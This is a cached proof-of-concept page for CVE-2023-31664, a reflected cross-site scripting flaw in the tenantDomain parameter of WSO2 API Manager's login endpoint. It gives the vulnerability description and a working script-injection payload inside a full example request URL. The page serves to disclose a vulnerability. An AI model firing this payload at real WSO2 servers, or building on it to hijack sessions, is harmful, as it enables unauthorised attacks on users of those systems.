CVE-2023-31664 PoC — WSO2 API Manager 跨站脚本漏洞

Source

https://github.com/adilkhan7/CVE-2023-31664

Associated Vulnerability

Title:WSO2 API Manager 跨站脚本漏洞 (CVE-2023-31664)
Description:WSO2 API Manager是美国WSO2公司的一套API生命周期管理解决方案。 WSO2 API Manager 4.2.0之前版本存在安全漏洞，该漏洞源于authenticationendpoint/login.do 中存在安全问题，允许攻击者通过 tenantDomain 参数注入精心设计的有效载荷执行任意 Web 脚本或 HTML。

Description

CVE-2023-31664 WSO2

Readme

# CVE-2023-31664
CVE-2023-31664 
A reflected cross-site scripting (XSS) vulnerability in /authenticationendpoint/login.do of WSO2 Api Manager below v4.2.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the tenantDomain parameter.

PoC: to exploit it only needs change the value of tenantDomain parameter from super.carbon to </script><script>alert(document.domain)</script>

Example: 
https://host/authenticationendpoint/login.do?client_id=..TRUNCATED...+openid&state=%2F&tenantDomain=</script><script>alert(document.domain)</script>&sessionDataKey=00000000000&relyingParty=AaAaAaAaA&type=oidc&sp=apim_admin_portal&isSaaSApp=true&authenticators=BasicAuthenticator 

Reported by: na1man

File Snapshot


 [4.0K]  /data/pocs/373eaff079246b6e8bf710816d119b09b8cd8090
└── [ 735]  README.md

0 directories, 1 file

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!